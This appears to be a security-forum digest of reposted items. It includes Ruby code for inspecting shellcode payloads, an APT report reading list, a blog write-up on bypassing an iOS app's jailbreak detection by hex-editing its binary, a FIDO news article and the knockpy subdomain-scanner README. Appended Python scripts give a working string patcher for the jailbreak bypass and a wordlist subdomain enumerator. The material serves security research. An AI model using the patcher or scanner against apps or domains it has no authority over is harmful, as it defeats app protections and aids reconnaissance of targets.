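  find_api_calls(SAMPLE_PAYLOAD).each { |c| printf("%04x  0x%08X  %s\n", c[:offset], c[:hash], c[:name]) }
  puts "exitfunc: #{exit_function(SAMPLE_PAYLOAD) || 'none found'}"
end
```

Run it against a real blob with `find_api_calls(File.binread('pay.raw'))`. If the first payload reports "process" or "thread" rather than "none", the serial concatenation from the post will never reach the second payload, and if no exit call is found at all, the blob may be one of the payloads whose exitfunc sits before data (like windows/exec) and needs the parallel -c route instead.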
-
Various public documents, whitepapers and articles about APT campaigns

APT Notes

This is a repository for various publicly-available documents and notes related to APT, sorted by year. For malware sample hashes, please see the individual reports.

Contributing

For the moment, it would be nice to have a PDF of the article that we add to the list, just to be sure we always have a copy. To contribute, you can either:
- Fork, add and send me a pull request
- Open a ticket with the data you want to be added

Adding data:
- Add a link to the public document to the README.md page
- Add the PDF file to the appropriate year

Thanks to the contributors for helping with the project!

Papers

The papers section contains historical documents.

2006
"Wicked Rose" and the NCPH Hacking Group

2008
Aug 10 - Russian Invasion of Georgia
Russian Cyberwar on Georgia
Oct 02 - How China will use cyber warfare to leapfrog in military competitiveness
Nov 04 - China's Electronic Long-Range Reconnaissance
Nov 19 - Agent.BTZ

2009
Jan 18 - Impact of Alleged Russian Cyber Attacks
Mar 29 - Tracking GhostNet

2010
Jan 12 - Operation Aurora
Jan 13 - The Command Structure of the Aurora Botnet - Damballa
Jan 20 - McAfee Labs: Combating Aurora
Jan 27 - Operation Aurora Detect, Diagnose, Respond
Jan ?? - Case Study: Operation Aurora - Triumfant
Feb 24 - How Can I Tell if I Was Infected By Aurora? (IOCs)
Mar 14 - In-depth Analysis of Hydraq
Apr 06 - Shadows in the cloud: Investigating Cyber Espionage 2.0
Sep 03 - The "MSUpdater" Trojan And Ongoing Targeted Attacks
Sep 30 - W32.Stuxnet Dossier
Dec 09 - The Stuxnet Computer Worm: Harbinger of an Emerging Warfare Capability

2011
Feb 10 - Global Energy Cyberattacks: Night Dragon
Feb 18 - Night Dragon Specific Protection Measures for Consideration
Apr 20 - Stuxnet Under the Microscope
Aug ?? - Shady RAT
Aug 04 - Operation Shady RAT
Aug 02 - Operation Shady RAT: Vanity
Aug 03 - HTran and the Advanced Persistent Threat
Sep 09 - The RSA Hack
Sep 11 - SK Hack by an Advanced Persistent Threat
Sep 22 - The "LURID" Downloader
Oct 12 - Alleged APT Intrusion Set: "1.php" Group
Oct 26 - Duqu Trojan Questions and Answers
Oct 31 - The Nitro Attacks: Stealing Secrets from the Chemical Industry
Dec 08 - Palebot trojan harvests Palestinian online credentials

2012
Jan 03 - The HeartBeat APT
Feb 03 - Command and Control in the Fifth Domain
Feb 29 - The Sin Digoo Affair
Mar 12 - Crouching Tiger, Hidden Dragon, Stolen Data
Mar 13 - Reversing DarkComet RAT's crypto
Mar 26 - Luckycat Redux
Apr 10 - Anatomy of a Gh0st RAT
Apr 16 - OSX.SabPub & Confirmed Mac APT attacks
May 18 - Analysis of Flamer C&C Server
May 22 - IXESHE: An APT Campaign
May 31 - sKyWIper (Flame/Flamer)
Jul 10 - Advanced Social Engineering for the Distribution of LURK Malware
Jul 11 - Wired article on DarkComet creator
Jul 27 - The Madi Campaign
Aug 09 - Gauss: Abnormal Distribution
Sep 06 - The Elderwood Project
Sep 07 - IEXPLORE RAT
Sep 12 - The VOHO Campaign: An in depth analysis
Sep 18 - The Mirage Campaign
Oct 08 - Matasano notes on DarkComet, Bandook, CyberGate and Xtreme RAT
Oct 27 - Trojan.Taidoor: Targeting Think Tanks
Nov 01 - Recovering from Shamoon
Nov 03 - Systematic cyber attacks against Israeli and Palestinian targets going on for a year

2013
Jan 14 - The Red October Campaign
Jan 14 - Red October Diplomatic Cyber Attacks Investigation
Jan 18 - Operation Red October
Feb 12 - Targeted cyber attacks: examples and challenges ahead
Feb 18 - Mandiant APT1 Report
Feb 22 - Comment Crew: Indicators of Compromise
Feb 26 - Stuxnet 0.5: The Missing Link
Feb 27 - The MiniDuke Mystery: PDF 0-day Government Spy Assembler 0x29A Micro Backdoor
Feb 27 - Miniduke: Indicators v1
Mar 13 - You Only Click Twice: FinFisher's Global Proliferation
Mar 17 - Safe: A Targeted Threat
Mar 20 - Dissecting Operation Troy
Mar 20 - The TeamSpy Crew Attacks
Mar 21 - Darkseoul/Jokra Analysis And Recovery
Mar 27 - APT1: technical backstage (Terminator/Fakem RAT)
Mar 28 - TR-12 - Analysis of a PlugX malware variant used for targeted attacks
Apr 01 - Trojan.APT.BaneChant
Apr 13 - "Winnti" More than just a game
Apr 24 - Operation Hangover
May ?? - Operation Hangover
May 30 - TR-14 - Analysis of a stage 3 Miniduke malware sample
Jun ?? - The Chinese Malware Complexes: The Maudi Surveillance Operation
Jun 01 - Crude Faux: An analysis of cyber conflict within the oil & gas industries
Jun 04 - The NetTraveller (aka 'Travnet')
Jun 07 - KeyBoy, Targeted Attacks against Vietnam and India
Jun 18 - Trojan.APT.Seinup Hitting ASEAN
Jun 21 - A Call to Harm: New Malware Attacks Target the Syrian Opposition
Jun 28 - njRAT Uncovered
Jul 09 - Dark Seoul Cyber Attack: Could it be worse?
Jul 15 - PlugX revisited: "Smoaler"
Jul 31 - Secrets of the Comfoo Masters
Jul 31 - Blackhat: In-Depth Analysis of Escalated APT Attacks (Lstudio, Elirks)
Aug ?? - Operation Hangover - Unveiling an Indian Cyberattack Infrastructure
Aug ?? - APT Attacks on Indian Cyber Space
Aug 02 - Where There is Smoke, There is Fire: South Asian Cyber Espionage Heats Up
Aug 02 - Surtr: Malware Family Targeting the Tibetan Community
Aug 19 - ByeBye Shell and the targeting of Pakistan
Aug 21 - POISON IVY: Assessing Damage and Extracting Intelligence
Aug 23 - Operation Molerats: Middle East Cyber Attacks Using Poison Ivy
Sep ?? - Feature: EvilGrab Campaign Targets Diplomatic Agencies
Sep 11 - The "Kimsuky" Operation
Sep 13 - Operation DeputyDog: Zero-Day (CVE-2013-3893) Attack Against Japanese Targets
Sep 17 - Hidden Lynx - Professional Hackers for Hire
Sep 25 - The 'ICEFROG' APT: A Tale of cloak and three daggers
Sep 30 - World War C: State of affairs in the APT world
Oct 24 - Terminator RAT or FakeM RAT
Nov 10 - Operation Ephemeral Hydra: IE Zero-Day Linked to DeputyDog Uses Diskless Method
Nov 11 - Supply Chain Analysis
Dec 02 - njRAT, The Saga Continues
Dec 11 - Operation "Ke3chang"
Dec 20 - ETSO APT Attacks Analysis
??? ?? - Deep Panda
??? ?? - Detecting and Defeating the China Chopper Web Shell

2014
Jan 06 - PlugX: some uncovered points
Jan 13 - Targeted attacks against the Energy Sector
Jan 14 - The Icefog APT Hits US Targets With Java Backdoor
Jan 15 - New CDTO: A Sneakernet Trojan Solution
Jan 21 - Shell_Crew (Deep Panda)
Jan 31 - Intruder File Report - Sneakernet Trojan
Feb 11 - Unveiling "Careto" - The Masked APT
Feb 13 - Operation SnowMan: DeputyDog Actor Compromises US Veterans of Foreign Wars Website
Feb 19 - The Monju Incident
Feb 19 - XtremeRAT: Nuisance or Threat?
Feb 20 - Operation GreedyWonk: Multiple Economic and Foreign Policy Sites Compromised, Serving Up Flash Zero-Day Exploit Feb 20 - Mo' Shells Mo' Problems - Deep Panda Web Shells Feb 23 - Gathering in the Middle East, Operation STTEAM Feb 28 - Uroburos: Highly complex espionage software with Russian roots Mar 06 - The Siesta Campaign Mar 07 - Snake Campaign & Cyber Espionage Toolkit Mar 08 - Russian spyware Turla Apr 26 - CVE-2014-1776: Operation Clandestine Fox May 13 - Operation Saffron Rose (aka Flying Kitten) May 13 - CrowdStrike's report on Flying Kitten May 20 - Miniduke Twitter C&C May 21 - RAT in jar: A phishing campaign using Unrecom Jun 06 - Illuminating The Etumbot APT Backdoor (APT12) Jun 09 - Putter Panda Jun 20 - Embassy of Greece Beijing Jun 30 - Dragonfly: Cyberespionage Attacks Against Energy Suppliers Jun 10 - Anatomy of the Attack: Zombie Zero Jul 07 - Deep Pandas Jul 10 - TR-25 Analysis - Turla / Pfinet / Snake/ Uroburos Jul 11 - Pitty Tiger Jul 20 - Sayad (Flying Kitten) Analysis & IOCs Jul 31 - Energetic Bear/Crouching Yeti Jul 31 - Energetic Bear/Crouching Yeti Appendix Aug 04 - Sidewinder Targeted Attack Against Android Aug 05 - Operation Arachnophobia Aug 06 - Operation Poisoned Hurricane Aug 07 - The Epic Turla Operation Appendix Aug 12 - New York Times Attackers Evolve Quickly (Aumlib/Ixeshe/APT12) Aug 13 - A Look at Targeted Attacks Through the Lense of an NGO Aug 18 - The Syrian Malware House of Cards Aug 20 - El Machete Aug 25 - Vietnam APT Campaign Aug 27 - NetTraveler APT Gets a Makeover for 10th Birthday Aug 27 - North Korea’s cyber threat landscape Aug 28 - Scanbox: A Reconnaissance Framework Used with Watering Hole Attacks Aug 29 - Syrian Malware Team Uses BlackWorm for Attacks Sep 03 - Darwin’s Favorite APT Group (APT12) Sep 04 - Forced to Adapt: XSLCmd Backdoor Now on OS X Sep 08 - Targeted Threat Index: Characterizingand Quantifying Politically-MotivatedTargeted Malware video Sep 08 - When Governments Hack Opponents: A Look at 
Actors and Technology video Sep 10 - Operation Quantum Entanglement Sep 17 - Chinese intrusions into key defense contractors Sep 18 - COSMICDUKE: Cosmu with a twist of MiniDuke Sep 19 - Watering Hole Attacks using Poison Ivy by "th3bug" group Sep 23 - Sep 26 - Aided Frame, Aided Direction (Sunshop Digital Quartermaster) Sep 26 - BlackEnergy & Quedagh Oct 03 - New indicators for APT group Nitro Oct 09 - Democracy in Hong Kong Under Attack Oct 14 - ZoxPNG Preliminary Analysis Oct 14 - Hikit Preliminary Analysis Oct 14 - Derusbi Preliminary Analysis Oct 14 - Group 72 (Axiom) Oct 14 - Sandworm - CVE-2104-4114 Oct 20 - OrcaRAT - A whale of a tale Oct 22 - Operation Pawn Storm: The Red in SEDNIT Oct 22 - Sofacy Phishing by PWC Oct 23 - Modified Tor Binaries Oct 24 - LeoUncia and OrcaRat Oct 27 - Full Disclosure of Havex Trojans - ICS Havex backdoors Oct 27 - ScanBox framework – who’s affected, and who’s using it? Oct 28 - APT28 - A Window Into Russia's Cyber Espionage Operations Oct 28 - Group 72, Opening the ZxShell Oct 30 - The Rotten Tomato Campaign Oct 31 - Operation TooHash Nov 03 - New observations on BlackEnergy2 APT activity Nov 03 - Operation Poisoned Handover: Unveiling Ties Between APT Activity in Hong Kong’s Pro-Democracy Movement Nov 10 - The Darkhotel APT - A Story of Unusual Hospitality Nov 11 - The Uroburos case- Agent.BTZ’s successor, ComRAT Nov 12 - Korplug military targeted attacks: Afghanistan & Tajikistan Nov 13 - Operation CloudyOmega: Ichitaro 0-day targeting Japan Nov 14 - OnionDuke: APT Attacks Via the Tor Network Nov 14 - Roaming Tiger (Slides) Nov 21 - Operation Double Tap | IOCs Nov 23 - Symantec's report on Regin Nov 24 - Kaspersky's report on The Regin Platform Nov 24 - TheIntercept's report on The Regin Platform Nov 24 - Deep Panda Uses Sakula Malware Nov 30 - FIN4: Stealing Insider Information for an Advantage in Stock Trading? 
Dec 02 - Operation Cleaver | IOCs Dec 03 - Operation Cleaver: The Notepad Files Dec 08 - The 'Penquin' Turla Dec 09 - The Inception Framework Dec 10 - Cloud Atlas: RedOctober APT Dec 10 - W32/Regin, Stage #1 Dec 10 - W64/Regin, Stage #1 Dec 10 - South Korea MBR Wiper Dec 12 - Vinself now with steganography Dec 12 - Bots, Machines, and the Matrix Dec 17 - Wiper Malware – A Detection Deep Dive Dec 18 - Malware Attack Targeting Syrian ISIS Critics Dec 19 - TA14-353A: Targeted Destructive Malware (wiper) Dec 21 - Operation Poisoned Helmand Dec 22 - Anunak: APT against financial institutions 2015 Jan 11 - Hong Kong SWC attack Jan 12 - Skeleton Key Malware Analysis Jan 15 - Evolution of Agent.BTZ to ComRAT Jan 20 - Analysis of Project Cobra Jan 20 - Reversing the Inception APT malware Jan 22 - The Waterbug attack group Jan 22 - Scarab attackers Russian targets | IOCs Jan 22 - Regin's Hopscotch and Legspin Jan 27 - Comparing the Regin module 50251 and the "Qwerty" keylogger Jan 29 - Backdoor.Winnti attackers and Trojan.Skelky Jan 29 - Analysis of PlugX Variant - P2P PlugX Feb 02 - Behind the Syrian Conflict’s Digital Frontlines Feb 04 - Pawn Storm Update: iOS Espionage App Found Feb 10 - CrowdStrike Global Threat Intel Report for 2014 Feb 16 - Equation: The Death Star of Malware Galaxy Feb 16 - The Carbanak APT Feb 16 - Operation Arid Viper Feb 17 - Desert Falcons APT Sursa: https://github.com/kbandla/APTnotes
-
a trivial iOS jailbreak detection bypass

introduction

Not too long ago, I toyed with an Android root detection bypass. In a similar scenario, I was poking at an iOS application that also had some root detection built in. For very much the same purpose, I suppose the application has its own ~reasons~ for the jailbreak detection. Of course, this makes the testing I actually wanted to do impossible, as I'd very much like to dig under the hood. So, it was time to try and bypass the jailbreak detection of the application.

All I had to work with was a .ipa. Similar to the Android .apk file, the .ipa is also just a zipped-up archive of the actual application files. To test with, I had an iPad mini. The iPad was running the latest iOS (8.1.2 at the time of this post) and was also jailbroken. If I remember correctly, the jailbreak tool used was called TaiG. Anyways, inside the application's .ipa archive was a whole bunch of resource files and whatnot, including the compiled application executable. This executable is what is of interest.

understanding the behavior

I installed the app onto my iPad and started to inspect its behavior. When the application starts, it would immediately throw a security-related error, notifying the user that it has detected the environment as one that is jailbroken. This happens pretty fast too. Once the jailbreak detection error shows, the application refuses to continue to run. Restarting the application simply continues this loop.

I studied some iOS jailbreak detection methods online, which revealed many of them as being pretty obvious: from detecting the presence of /bin/bash or Cydia.app, to examining the exit status of fork(). There are some more advanced methods as well, such as checking the existence of certain known dylibs too (which apparently is the hardest to circumvent). For the purpose of this post, the jailbreak detection was pretty weak and did not have any of the more advanced methods implemented. In fact, I am pretty sure there won't be that many apps out there that will be this easy to bypass.

discovering the implementation

Armed with some knowledge of how it's typically done in the iOS world, I proceeded to take a look at the actual application binary:

    leonjza@laptop » file myApplication
    myApplication: Mach-O executable arm

Compiled as a Mach-O executable from Objective-C, I loaded up the binary from the extracted .ipa into the Hopper disassembler to help me get an idea of what is happening. Hopper has some nice features such as generating pseudo code etc., so I quite like using it for these types of excursions.

To start off, I searched around for strings that were related to the word jailbreak within the app. Class definitions, methods or any strings related to the term jailbreak were ok. I just wanted to get something to start off with. I found nothing. Of course, this had me thinking that I may have missed the plot entirely. I continued to search for other things related to jailbreaking, and got a hit immediately for the term /bin/bash in the string section. In fact, there are quite a few other jailbreak-related strings in this section.

From within Hopper, one can check where these strings are referenced from. So, I followed this and landed up in a function that does what I would have expected a jailbreak detection function to do, but with a completely unexpected class/method name: -[MobileDisplay isRetinaDisplay]. Very sneaky. So we are working with the isRetinaDisplay method, which is the one doing the jailbreak detection. As can be seen in the above screenshot, the fileExistsAtPath for /Applications/Cydia.app is hardly something I would have expected in an isRetinaDisplay implementation.

planning an attack

At this stage, I was fairly certain that I had found the code I was looking for. From the method name isRetinaDisplay, I reasoned a little and guessed that this was actually supposed to say isJailBroken. I want this method to return false. My mind went straight to getting cycript ready for some method swizzling. I started to set things up and played around a little, when I realized that I don't think I will be able to manipulate the runtime fast enough for this to work. Remember, the first thing the app does is check the jailbreak status. A bit of thinking, a few coffees, special alone time with Google and lots of reading, and I came to realize that even if I was able to get this method swizzling to work, I'd have to do this every time the application starts up. This was not going to work for me. It was time to rethink my strategy.

Considering how the jailbreak detection works, most of the ways that I saw in the application were related to file existence checks. There was also an attempt to write to /private/jailbreak.txt, as well as open a cydia:// URL. I realized that I could probably just change these strings to things that will inherently fail and cause the method to not return true for any of the checks.

in 1992 we had hex editors too

I ssh'd into my iPad and located the application's installed directory. Once I had found this, I scp'd the compiled binary to my Kali Linux install and opened it in a hex editor. I realized later I could have probably just used the binary I already had locally. Referencing the disassembly of isRetinaDisplay, I searched for the strings it used using a hex editor. For each string I would replace a few characters with 0, ensuring that I keep the original string length intact. For example: /bin/bash was replaced with /bin/ba00.

I ended up editing the following strings using the hex editor:

    /Applications/Cydia.app -> /Applications/Cyd00.app
    /Library/MobileSubstrate/MobileSubstrate.dylib -> /Library/MobileSubstrate/MobileSubstra00.dylib
    /bin/bash -> /bin/ba00
    /usr/sbin/sshd -> /usr/sbin/ss00
    /etc/apt -> /etc/a00
    /private/jailbreak.txt -> /0000000/0000000000000
    cydia://package/com.example.package -> cyd00://package/com.example.package

I saved the modifications that I had done, and scp'd the binary back to my iPad to the folder where it was installed. I literally just overwrote the existing binary. At this stage I figured I would most certainly have some form of signing-related problem, as the binary had been tampered with. Well, this was not the case. Instead, I was no longer greeted with the lame jailbreak security error.

summary

In the end, it was pretty easy to find the jailbreak detection code. Deducing a few things based on the disassembly made it easy to find the method responsible for the checks, regardless of the attempt to hide it via a name change. Furthermore, using something as simple as a hex editor, a trivial implementation such as this was very easily bypassed.

Posted by Leon Jacobs Feb 20th, 2015
bypass, hex, ios, jailbreak
Sursa: https://leonjza.github.io/blog/2015/02/20/a-trivial-ios-jailbreak-detection-bypass/
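The hex-editor step from the post, done in code as an added example (this is not the author's tooling, and the script does not know anything about the real app). It applies the post's replacement table to a binary, refuses any replacement whose byte length differs from the original (the one check that matters, since a longer or shorter string would shift every offset after it), and only rewrites whole NUL-terminated C strings, so a longer path that merely starts with the same bytes, such as an assumed /etc/apt/sources.list, is left alone. SAMPLE_BINARY is a constructed stand-in for the Mach-O executable so the script runs offline.

```python
"""Length-preserving string patching of a binary: the hex-editor step in code.
Added example, not the original author's tooling. SAMPLE_BINARY is constructed."""
import sys
from typing import Dict, List, Tuple

# Replacement table from the post. Every replacement is exactly as long as the
# original, so nothing after it in the binary moves.
PATCHES = {
    b"/Applications/Cydia.app": b"/Applications/Cyd00.app",
    b"/Library/MobileSubstrate/MobileSubstrate.dylib": b"/Library/MobileSubstrate/MobileSubstra00.dylib",
    b"/bin/bash": b"/bin/ba00",
    b"/usr/sbin/sshd": b"/usr/sbin/ss00",
    b"/etc/apt": b"/etc/a00",
    b"/private/jailbreak.txt": b"/0000000/0000000000000",
    b"cydia://package/com.example.package": b"cyd00://package/com.example.package",
}

# Constructed stand-in for the app binary: a fake header followed by a few
# NUL-terminated strings, the way they sit in a Mach-O __cstring section.
SAMPLE_BINARY = (
    b"\xcf\xfa\xed\xfe" + b"\x00" * 12
    + b"/Applications/Cydia.app\x00"
    + b"/bin/bash\x00"
    + b"/etc/apt\x00"
    + b"/etc/apt/sources.list\x00"      # longer path sharing a prefix: must stay intact
    + b"isRetinaDisplay\x00"
    + b"/private/jailbreak.txt\x00"
    + b"cydia://package/com.example.package\x00"
)


def check_lengths(patches: Dict[bytes, bytes]) -> None:
    """Refuse any replacement that would change the byte length."""
    for old, new in patches.items():
        if len(old) != len(new):
            raise ValueError("length mismatch: %r (%d) -> %r (%d)"
                             % (old, len(old), new, len(new)))


def patch_strings(blob: bytes, patches: Dict[bytes, bytes]) -> Tuple[bytes, Dict[bytes, int]]:
    """Overwrite whole C strings in place; returns (patched blob, hits per string).
    A match only counts when a NUL (or end of file) follows it, so a longer path
    that merely starts with the same bytes is left alone."""
    check_lengths(patches)
    out = bytearray(blob)
    hits = {}  # type: Dict[bytes, int]
    for old, new in patches.items():
        count = 0
        pos = 0
        while True:
            idx = out.find(old, pos)
            if idx < 0:
                break
            end = idx + len(old)
            if end == len(out) or out[end] == 0:
                out[idx:end] = new
                count += 1
            pos = end
        hits[old] = count
    return bytes(out), hits


def leftovers(blob: bytes, patches: Dict[bytes, bytes]) -> List[bytes]:
    """Table strings still present as whole C strings (should be empty after patching)."""
    return [old for old in patches
            if blob.find(old + b"\x00") >= 0 or blob.endswith(old)]


def patch_file(src: str, dst: str) -> Dict[bytes, int]:
    """Patch a real file on disk and report how many times each string was hit."""
    with open(src, "rb") as fh:
        blob = fh.read()
    patched, hits = patch_strings(blob, PATCHES)
    with open(dst, "wb") as fh:
        fh.write(patched)
    return hits


if __name__ == "__main__":
    if len(sys.argv) == 3:   # python patch_strings.py myApplication myApplication.patched
        report = patch_file(sys.argv[1], sys.argv[2])
    else:
        _, report = patch_strings(SAMPLE_BINARY, PATCHES)
    for old, count in report.items():
        print("%d x %s" % (count, old.decode()))
```

A hit count of 0 for a string in the table is worth looking at before copying the binary back: it means that check either is not in this build or is assembled at runtime rather than stored as a literal, and the patch will not reach it.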
-
Windows 10 embraces password-killing biometric authentication
Ian Paul @ianpaul
Ian is an independent writer based in Tel Aviv, Israel. His current focus is on all things tech including mobile devices, desktop and laptop computers, software, social networks, Web apps, tech-related legislation and corporate tech news.

Microsoft is about to officially join the fight for authentication without pesky passwords. The company recently announced that Windows 10 will support the Fast Identity Online (FIDO) 2.0 specification. The end result is that instead of using passwords to log in to PCs, Microsoft services, and other third-party accounts, you'll be able to use a fingerprint or eye scan, possibly integrated with a key fob for two-factor authentication.

In its blog post announcing FIDO in Windows 10, Microsoft focused largely on features that would interest IT types, such as FIDO support for major enterprise-focused cloud services including Office 365 Exchange Online, Salesforce, Citrix, and Box. But FIDO in Windows 10 will also work with consumer services such as Windows 10 sign-ins, Outlook.com, and OneDrive.

Why this matters: The call to kill passwords with a better authentication solution has been ongoing for some time. FIDO appears to be the best chance for a one-size-fits-all solution to password-less authentication. The FIDO Alliance includes many major tech companies and other businesses with a big interest in security, including Arm, Bank of America, Google, Lenovo, Mastercard, PayPal, and Visa. Microsoft joined the FIDO Alliance in late 2013. When heavy hitters work together on problems like this, the end result tends to be a near-universal solution, an absolute must if FIDO is to truly replace the password.

What is FIDO?

The idea behind FIDO isn't all that new. Instead of using passwords, which can be forgotten, lost, stolen, or even guessed, a FIDO-equipped device would use biometrics such as fingerprint and eye scans that are much harder to acquire. This initial login method could also be paired with a key fob for two-factor authentication for added security.

Biometric scanners have already been integrated into smartphones, laptops, and other devices for years. The difference with FIDO is that it's an open standard, meaning any company can implement it in their products or services. It also means that FIDO-compliant biometric scanners and two-factor authentication devices can be used with any FIDO-supporting service, as opposed to the hodgepodge of fingerprint scanning security mechanisms we have now. The FIDO specifications are also designed so that a user's biometric data never leaves the device.

For anyone who wants to check it out, Microsoft says FIDO integration is already available in the Windows 10 Technical Preview for enterprise applications as well as Windows 10 sign-in.

Sursa: Windows 10 embraces password-killing biometric authentication | PCWorld
-
Knock Subdomain Scan v.3.0rc1

Knockpy is a python tool designed to enumerate subdomains on a target domain through a wordlist.

Usage

    knockpy [-h] [-v] [-w WORDLIST] [-r] [-z] domain

positional arguments:
    domain           specific target domain, like domain.com

optional arguments:
    -h, --help       show this help message and exit
    -v, --version    show program's version number and exit
    -w WORDLIST      specific path to wordlist file
    -r, --resolve    resolve ip or domain name
    -z, --zone       check for zone transfer

note: the ALIAS name is marked in yellow.

Example

subdomain scan with internal wordlist
    knockpy domain.com

subdomain scan with external wordlist
    knockpy domain.com -w wordlist.txt

resolve domain name and get response headers
    knockpy -r domain.com

check zone transfer for domain name
    knockpy -z domain.com

Install

from pypi (as root)
    pip install https://github.com/guelfoweb/knock/archive/knock3.zip

or manually, download zip and extract folder
    cd knock-knock3/
    (as root) python setup.py install

note: tested with python 2.7.6 | it is recommended to use Google DNS (8.8.8.8 | 8.8.4.4)

Talk about
Ethical Hacking and Penetration Testing Guide Book by Rafay Baloch

Other
This tool is currently maintained by Gianni 'guelfoweb' Amato, who can be contacted at guelfoweb@gmail.com or twitter @guelfoweb. Suggestions and criticism are welcome.

Sponsored by Security Side

Sursa: https://github.com/guelfoweb/knock/tree/knock3
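What a wordlist subdomain scan like the one above does under the hood, as an added illustrative example (this is not knockpy's own code): try each word as a label under the target, keep the names that resolve, mark an alias where the canonical name differs from the queried one (the CNAME case the README says is shown in yellow), and, before any of that, probe a few random labels to detect a wildcard record, the case where every word in the list would "resolve" and the hits would mean nothing. The resolver is a parameter: the demo zone, hostnames and addresses are constructed (documentation ranges) so the script runs offline, and system_resolve() swaps in real lookups through the OS resolver when a domain and wordlist file are given on the command line.

```python
"""Wordlist subdomain enumeration with alias marking and a wildcard-DNS check.
Added example of the technique, not knockpy's code. The demo zone is constructed."""
import random
import socket
import string
import sys
from typing import Callable, Dict, List, Optional, Tuple

# A resolver maps a hostname to (canonical_name, [ip, ...]), or None for NXDOMAIN.
Answer = Tuple[str, List[str]]
Resolver = Callable[[str], Optional[Answer]]


def system_resolve(name: str) -> Optional[Answer]:
    """Real lookup through the OS resolver (needs network). gethostbyname_ex
    returns the canonical name first, so a CNAME shows up as canonical != name."""
    try:
        canonical, _aliases, ips = socket.gethostbyname_ex(name)
    except socket.gaierror:
        return None
    return canonical, ips


def make_fake_resolver(domain: str, zone: Dict[str, Answer],
                       wildcard_ips: Optional[List[str]] = None) -> Resolver:
    """Constructed in-memory zone for the offline demo. With wildcard_ips set,
    every unknown label under domain answers, mimicking a *.domain record."""
    def resolve(name: str) -> Optional[Answer]:
        if name in zone:
            return zone[name]
        if wildcard_ips is not None and name.endswith("." + domain):
            return name, list(wildcard_ips)
        return None
    return resolve


def has_wildcard(domain: str, resolve: Resolver, probes: int = 3) -> bool:
    """Resolve a few random labels nobody would put in a wordlist. If they all
    answer, the zone has a wildcard record and wordlist hits prove nothing."""
    rng = random.Random(0)  # fixed seed keeps the demo deterministic
    alphabet = string.ascii_lowercase + string.digits
    for _ in range(probes):
        label = "".join(rng.choice(alphabet) for _ in range(16))
        if resolve("%s.%s" % (label, domain)) is None:
            return False
    return True


def enumerate_subdomains(domain: str, wordlist: List[str],
                         resolve: Resolver) -> List[Dict[str, object]]:
    """Try every word as a label under domain and keep the names that resolve.
    'alias' is True when the answer came back under a different canonical name."""
    found = []
    for word in wordlist:
        word = word.strip().lower()
        if not word or word.startswith("#"):   # skip blanks and comments
            continue
        host = "%s.%s" % (word, domain)
        answer = resolve(host)
        if answer is None:
            continue
        canonical, ips = answer
        found.append({
            "host": host,
            "ips": ips,
            "canonical": canonical,
            "alias": canonical.rstrip(".").lower() != host,
        })
    return found


def scan(domain: str, wordlist: List[str], resolve: Resolver) -> Dict[str, object]:
    """Wildcard check first; only enumerate when a hit can mean something."""
    wildcard = has_wildcard(domain, resolve)
    results = [] if wildcard else enumerate_subdomains(domain, wordlist, resolve)
    return {"domain": domain, "wildcard": wildcard, "results": results}


# Constructed demo zone (documentation addresses, not real hosts).
DEMO_DOMAIN = "example.com"
DEMO_ZONE = {
    "www.example.com": ("www.example.com", ["192.0.2.10"]),
    "mail.example.com": ("mail.example.com", ["192.0.2.20"]),
    "blog.example.com": ("ghs.example.net", ["198.51.100.5"]),  # CNAME -> alias
}
DEMO_WORDLIST = ["www", "mail", "blog", "dev", "# comment", "", "ftp"]


if __name__ == "__main__":
    if len(sys.argv) == 3:   # real run: python knock_demo.py domain.com wordlist.txt
        with open(sys.argv[2]) as fh:
            report = scan(sys.argv[1], fh.read().splitlines(), system_resolve)
    else:
        report = scan(DEMO_DOMAIN, DEMO_WORDLIST, make_fake_resolver(DEMO_DOMAIN, DEMO_ZONE))
    if report["wildcard"]:
        print("wildcard DNS on %s: wordlist results would be meaningless" % report["domain"])
    for entry in report["results"]:
        tag = " (ALIAS -> %s)" % entry["canonical"] if entry["alias"] else ""
        print("%s %s%s" % (entry["host"], ",".join(entry["ips"]), tag))
```

The wildcard probe is the part to keep when writing your own: without it a zone with a *.domain record returns a "hit" for every entry in the wordlist, and the only way to tell real hosts apart is to compare each answer against the wildcard's addresses.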